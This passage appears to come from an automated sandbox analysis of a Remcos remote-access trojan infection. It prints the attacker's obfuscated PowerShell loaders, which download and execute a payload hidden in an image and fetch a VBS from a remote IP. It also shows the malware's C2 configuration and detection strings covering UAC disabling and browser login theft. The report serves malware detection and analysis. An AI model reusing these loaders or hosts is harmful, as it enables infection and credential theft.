?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 3940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
                • RegAsm.exe (PID: 4040 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
                • RegAsm.exe (PID: 4056 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
                • RegAsm.exe (PID: 4064 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 816 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 3032 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 2080 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 3164 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 3040 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 728 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 2556 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 2180 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "camzeroconnect.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GT4655", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.624187857.00000000007F5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6c4b8:$a1: Remcos restarted by watchdog!
          • 0x6ca30:$a3: %02i:%02i:%02i:%03i
          Click to see the 21 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          14.2.powershell.exe.12691f90.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            14.2.powershell.exe.12691f90.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              14.2.powershell.exe.12691f90.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                14.2.powershell.exe.12691f90.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x690b8:$a1: Remcos restarted by watchdog!
                • 0x69630:$a3: %02i:%02i:%02i:%03i
                14.2.powershell.exe.12691f90.0.unpackREMCOS_RAT_variantsunknownunknown
                • 0x6310c:$str_a1: C:\Windows\System32\cmd.exe
                • 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x6317c:$str_b2: Executing file:
                • 0x641fc:$str_b3: GetDirectListeningPort
                • 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x63d28:$str_b7: \update.vbs
                • 0x631a4:$str_b9: Downloaded file:
                • 0x63190:$str_b10: Downloading file:
                • 0x63234:$str_b12: Failed to upload file:
                • 0x641c4:$str_b13: StartForward
                • 0x641e4:$str_b14: StopForward
                • 0x63c80:$str_b15: fso.DeleteFile "
                • 0x63c14:$str_b16: On Error Resume Next
                • 0x63cb0:$str_b17: fso.DeleteFolder "
                • 0x63224:$str_b18: Uploaded file:
                • 0x631e4:$str_b19: Unable to delete:
                • 0x63c48:$str_b20: while fso.FileExists("
                • 0x636c1:$str_c0: [Firefox StoredLogins not found]
                Click to see the 19 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Base64 Encoded PowerShell Command Detected
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                Sigma detected: File With Uncommon Extension Created By An Office Application
                Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3236, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetcateudpationprocess[1].hta
                Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0
                Sigma detected: Potentially Suspicious PowerShell Child Processes
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3612, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , ProcessId: 3808, ProcessName: wscript.exe
                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                Sigma detected: Suspicious MSHTA Child Process
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSx